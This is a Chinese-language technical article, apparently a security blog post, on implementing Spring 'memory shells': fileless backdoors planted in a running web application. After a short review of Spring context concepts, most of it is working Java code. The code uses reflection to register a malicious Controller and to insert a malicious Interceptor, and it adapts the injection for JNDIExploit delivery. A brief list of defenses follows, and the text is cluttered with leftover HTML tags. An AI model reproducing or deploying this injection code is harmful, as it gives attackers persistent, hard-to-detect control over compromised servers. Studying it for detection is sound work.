Spring内存马技术深入分析与实现<\/h1>

一、Spring核心概念基础<\/h2>

1. Bean概念<\/h3>

定义<\/strong>：Bean是Spring框架的核心概念，是构成应用程序的主干对象<\/li>

特性<\/strong>：

由Spring IoC容器负责实例化、配置、组装和管理<\/li>
本质上是普通的Java对象<\/li>
通过配置元数据（XML、注解或Java代码）描述<\/li> <\/ul> <\/li> <\/ul>
2. ApplicationContext<\/h3>

继承关系<\/strong>：ApplicationContext接口继承自BeanFactory接口<\/li>
功能<\/strong>：

代表IoC容器<\/li>
负责实例化、定位、配置应用程序中的对象及建立依赖关系<\/li>
扩展了基本容器的功能<\/li> <\/ul> <\/li> <\/ul>
3. ContextLoaderListener与DispatcherServlet<\/h3>

典型web.xml配置<\/strong>：<\/li> <\/ul>
<context-param><\/span> <\/span><\/span> <param-name><\/span>contextConfigLocation<\/param-name><\/span> <\/span><\/span> <param-value><\/span>\/WEB-INF\/applicationContext.xml<\/param-value><\/span> <\/span><\/span><\/context-param><\/span> <\/span><\/span><listener><\/span> <\/span><\/span> <listener-class><\/span>org.springframework.web.context.ContextLoaderListener<\/listener-class><\/span> <\/span><\/span><\/listener><\/span> <\/span><\/span><servlet><\/span> <\/span><\/span> <servlet-name><\/span>dispatcherServlet<\/servlet-name><\/span> <\/span><\/span> <servlet-class><\/span>org.springframework.web.servlet.DispatcherServlet<\/servlet-class><\/span> <\/span><\/span> <init-param><\/span> <\/span><\/span> <param-name><\/span>contextConfigLocation<\/param-name><\/span> <\/span><\/span> <param-value><\/span>\/WEB-INF\/dispatcherServlet-servlet.xml<\/param-value><\/span> <\/span><\/span> <\/init-param><\/span> <\/span><\/span> <load-on-startup><\/span>1<\/load-on-startup><\/span> <\/span><\/span><\/servlet><\/span> <\/span><\/span><\/code><\/pre> Root Context与Child Context<\/strong>：<\/p> 一个应用中可以有多个Context，但只有一个Root Context<\/li> 所有Child Context可以访问Root Context中定义的bean<\/li> Root Context无法访问Child Context中定义的bean<\/li> Context创建后都会被作为属性添加到ServletContext中<\/li> <\/ul> <\/li> ContextLoaderListener<\/strong>：<\/p> 初始化全局唯一的Root WebApplicationContext<\/li> 共享IoC容器供其他Child Context使用<\/li> <\/ul> <\/li> DispatcherServlet<\/strong>：<\/p> 每个DispatcherServlet创建一个Child Context<\/li> 代表独立的IoC容器<\/li> <\/ul> <\/li> <\/ul> 二、Spring Controller内存马实现<\/h2> 1. 获取Context的四种方法<\/h3> getCurrentWebApplicationContext()<\/strong><\/li> <\/ol> WebApplicationContext context =<\/span> ContextLoader.<\/span>getCurrentWebApplicationContext<\/span>();<\/span> <\/span><\/span><\/code><\/pre> WebApplicationContextUtils<\/strong><\/li> <\/ol> WebApplicationContext context =<\/span> WebApplicationContextUtils.<\/span>getWebApplicationContext<\/span>(<\/span> <\/span><\/span> RequestContextUtils.<\/span>getWebApplicationContext<\/span>(<\/span> <\/span><\/span> ((<\/span>ServletRequestAttributes)<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>()).<\/span>getRequest<\/span>()<\/span> <\/span><\/span> ).<\/span>getServletContext<\/span>()<\/span> <\/span><\/span>);<\/span> <\/span><\/span><\/code><\/pre> RequestContextUtils<\/strong><\/li> <\/ol> WebApplicationContext context =<\/span> RequestContextUtils.<\/span>getWebApplicationContext<\/span>(<\/span> <\/span><\/span> ((<\/span>ServletRequestAttributes)<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>()).<\/span>getRequest<\/span>()<\/span> <\/span><\/span>);<\/span> <\/span><\/span><\/code><\/pre> getAttribute<\/strong><\/li> <\/ol> WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>()<\/span> <\/span><\/span> .<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span> <\/span><\/span><\/code><\/pre>2. RequestMappingHandlerMapping<\/h3> 作用<\/strong>：处理Controller中@RequestMapping注解的方法<\/li> 获取方法<\/strong>：<\/li> <\/ul> RequestMappingHandlerMapping mapping =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span> <\/span><\/span><\/code><\/pre>3. 反射获取mappingRegistry属性<\/h3> Field f =<\/span> mapping.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"mappingRegistry"<\/span>);<\/span> <\/span><\/span>f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>Object mappingRegistry =<\/span> f.<\/span>get<\/span>(<\/span>mapping);<\/span> <\/span><\/span><\/code><\/pre>4. 注册Controller完整流程<\/h3> @Controller<\/span> <\/span><\/span>public<\/span> class<\/span> AddControllerMemshell<\/span> {<\/span> <\/span><\/span> @RequestMapping<\/span>(<\/span>value =<\/span> "\/addcontroller"<\/span>)<\/span> <\/span><\/span> public<\/span> void<\/span> addController<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> final<\/span> String controllerPath =<\/span> "\/zh1z3ven"<\/span>;<\/span> <\/span><\/span> \/\/ 获取Context <\/span><\/span><\/span><\/span> WebApplicationContext context =<\/span> RequestContextUtils.<\/span>findWebApplicationContext<\/span>(<\/span> <\/span><\/span> ((<\/span>ServletRequestAttributes)<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>()).<\/span>getRequest<\/span>()<\/span> <\/span><\/span> );<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取RequestMappingHandlerMapping <\/span><\/span><\/span><\/span> RequestMappingHandlerMapping mapping =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 反射获取mappingRegistry <\/span><\/span><\/span><\/span> Field f =<\/span> mapping.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"mappingRegistry"<\/span>);<\/span> <\/span><\/span> f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Object mappingRegistry =<\/span> f.<\/span>get<\/span>(<\/span>mapping);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 检查URL是否已存在 <\/span><\/span><\/span><\/span> Class<?><\/span> c =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry"<\/span>);<\/span> <\/span><\/span> Field field =<\/span> c.<\/span>getDeclaredField<\/span>(<\/span>"urlLookup"<\/span>);<\/span> <\/span><\/span> field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Map<<\/span>String,<\/span> Object><\/span> urlLookup =<\/span> (<\/span>Map<<\/span>String,<\/span> Object>)<\/span> field.<\/span>get<\/span>(<\/span>mappingRegistry);<\/span> <\/span><\/span> for<\/span> (<\/span>String urlPath :<\/span> urlLookup.<\/span>keySet<\/span>())<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>controllerPath.<\/span>equals<\/span>(<\/span>urlPath))<\/span> {<\/span> <\/span><\/span> response.<\/span>getWriter<\/span>().<\/span>println<\/span>(<\/span>"controller url path exist already"<\/span>);<\/span> <\/span><\/span> return<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ 构造RequestMappingInfo <\/span><\/span><\/span><\/span> PatternsRequestCondition url =<\/span> new<\/span> PatternsRequestCondition(<\/span>controllerPath);<\/span> <\/span><\/span> RequestMethodsRequestCondition condition =<\/span> new<\/span> RequestMethodsRequestCondition();<\/span> <\/span><\/span> RequestMappingInfo info =<\/span> new<\/span> RequestMappingInfo(<\/span>url,<\/span> condition,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取恶意Controller类 <\/span><\/span><\/span><\/span> Class<?><\/span> myClass =<\/span> Util.<\/span>getClass<\/span>(<\/span>CONTROLLER_CMDMEMSHELL_CLASS_STRING);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 反射调用register方法注册Controller <\/span><\/span><\/span><\/span> Method[]<\/span> ms =<\/span> c.<\/span>getDeclaredMethods<\/span>();<\/span> <\/span><\/span> for<\/span> (<\/span>Method method :<\/span> ms)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>"register"<\/span>.<\/span>equals<\/span>(<\/span>method.<\/span>getName<\/span>()))<\/span> {<\/span> <\/span><\/span> method.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> method.<\/span>invoke<\/span>(<\/span>mappingRegistry,<\/span> info,<\/span> myClass.<\/span>newInstance<\/span>(),<\/span> myClass.<\/span>getMethods<\/span>()[<\/span>0<\/span>]);<\/span> <\/span><\/span> response.<\/span>getWriter<\/span>().<\/span>println<\/span>(<\/span>"spring controller add"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>三、Spring Interceptor内存马实现<\/h2> 1. HandlerInterceptor接口<\/h3> 三个核心方法<\/strong>： preHandle<\/code>：controller方法执行前拦截 return true：放行<\/li> return false：不放行<\/li> <\/ul> <\/li> postHandle<\/code>：controller方法执行后，JSP视图执行前<\/li> afterCompletion<\/code>：JSP执行后<\/li> <\/ul> <\/li> <\/ul> 2. 拦截器注册流程<\/h3> @Controller<\/span> <\/span><\/span>public<\/span> class<\/span> AddInterceptorMemshell<\/span> {<\/span> <\/span><\/span> @RequestMapping<\/span>(<\/span>value =<\/span> "\/addinterceptor"<\/span>)<\/span> <\/span><\/span> public<\/span> void<\/span> addInterceptor<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 获取Context <\/span><\/span><\/span><\/span> WebApplicationContext context =<\/span> RequestContextUtils.<\/span>findWebApplicationContext<\/span>(<\/span> <\/span><\/span> ((<\/span>ServletRequestAttributes)<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>()).<\/span>getRequest<\/span>()<\/span> <\/span><\/span> );<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取RequestMappingHandlerMapping <\/span><\/span><\/span><\/span> RequestMappingHandlerMapping mapping =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 反射获取adaptedInterceptors属性 <\/span><\/span><\/span><\/span> Field f =<\/span> mapping.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"adaptedInterceptors"<\/span>);<\/span> <\/span><\/span> f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> List<<\/span>HandlerInterceptor><\/span> list =<\/span> (<\/span>List<<\/span>HandlerInterceptor>)<\/span> f.<\/span>get<\/span>(<\/span>mapping);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 添加恶意拦截器 <\/span><\/span><\/span><\/span> list.<\/span>add<\/span>((<\/span>HandlerInterceptor)<\/span>Util.<\/span>getClass<\/span>(<\/span>Util.<\/span>INTERCEPTOR_CMDMEMSHELL_CLASS_STRING<\/span>).<\/span>newInstance<\/span>());<\/span> <\/span><\/span> response.<\/span>getWriter<\/span>().<\/span>println<\/span>(<\/span>"interceptor added"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. 拦截器初始化过程<\/h3> DispatcherServlet#doDispatch方法调用getHandler<\/li> AbstractHandlerMapping#getHandler获取HandlerExecutionChain<\/li> getHandlerExecutionChain方法通过HandlerExecutionChain#addInterceptor添加拦截器<\/li> <\/ol> 四、JNDIExploit改造实践<\/h2> 1. 获取Context的替代方案<\/h3> \/\/ 反射获取Context <\/span><\/span><\/span><\/span>Class RCHClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.web.context.request.RequestContextHolder"<\/span>);<\/span> <\/span><\/span>ServletRequestAttributes servletRequestAttributes =<\/span> (<\/span>ServletRequestAttributes)<\/span> RCHClass <\/span><\/span> .<\/span>getDeclaredMethod<\/span>(<\/span>"currentRequestAttributes"<\/span>).<\/span>invoke<\/span>(<\/span>RCHClass,<\/span> null<\/span>);<\/span> <\/span><\/span> <\/span><\/span>Class SRAClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.web.context.request.ServletRequestAttributes"<\/span>);<\/span> <\/span><\/span>Method getRequestMethod =<\/span> SRAClass.<\/span>getDeclaredMethod<\/span>(<\/span>"getRequest"<\/span>);<\/span> <\/span><\/span> <\/span><\/span>Class RCUClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.web.servlet.support.RequestContextUtils"<\/span>);<\/span> <\/span><\/span>Method findWebApplicationContextMethod =<\/span> RCUClass.<\/span>getMethod<\/span>(<\/span>"findWebApplicationContext"<\/span>,<\/span> HttpServletRequest.<\/span>class<\/span>);<\/span> <\/span><\/span> <\/span><\/span>WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span> findWebApplicationContextMethod.<\/span>invoke<\/span>(<\/span> <\/span><\/span> RCUClass,<\/span> getRequestMethod.<\/span>invoke<\/span>(<\/span>servletRequestAttributes)<\/span> <\/span><\/span>);<\/span> <\/span><\/span><\/code><\/pre>2. 完整注入流程<\/h3> \/\/ 获取RequestMappingHandlerMapping <\/span><\/span><\/span><\/span>RequestMappingHandlerMapping mapping =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 反射获取adaptedInterceptors并添加拦截器 <\/span><\/span><\/span><\/span>Field f =<\/span> mapping.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"adaptedInterceptors"<\/span>);<\/span> <\/span><\/span>f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>List<<\/span>HandlerInterceptor><\/span> list =<\/span> (<\/span>List<<\/span>HandlerInterceptor>)<\/span> f.<\/span>get<\/span>(<\/span>mapping);<\/span> <\/span><\/span>list.<\/span>add<\/span>((<\/span>HandlerInterceptor)<\/span> clazz.<\/span>newInstance<\/span>());<\/span> <\/span><\/span><\/code><\/pre>五、防御措施<\/h2> 监控Context修改<\/strong>：监控ApplicationContext的异常修改行为<\/li> 检查注册的Controller<\/strong>：定期检查系统中注册的Controller列表<\/li> 拦截器白名单<\/strong>：维护合法的拦截器白名单<\/li> 运行时保护<\/strong>：使用RASP技术防护关键方法的调用<\/li> 版本升级<\/strong>：及时更新Spring框架版本<\/li> <\/ol> 六、参考资源<\/h2> Spring官方文档<\/li> LandGrey师傅的Spring内存马分析<\/li> su18师傅的Spring内存马实现思路<\/li> JNDIExploit项目源码<\/li> Behinder3\/Godzilla4内存马实现<\/li> <\/ol>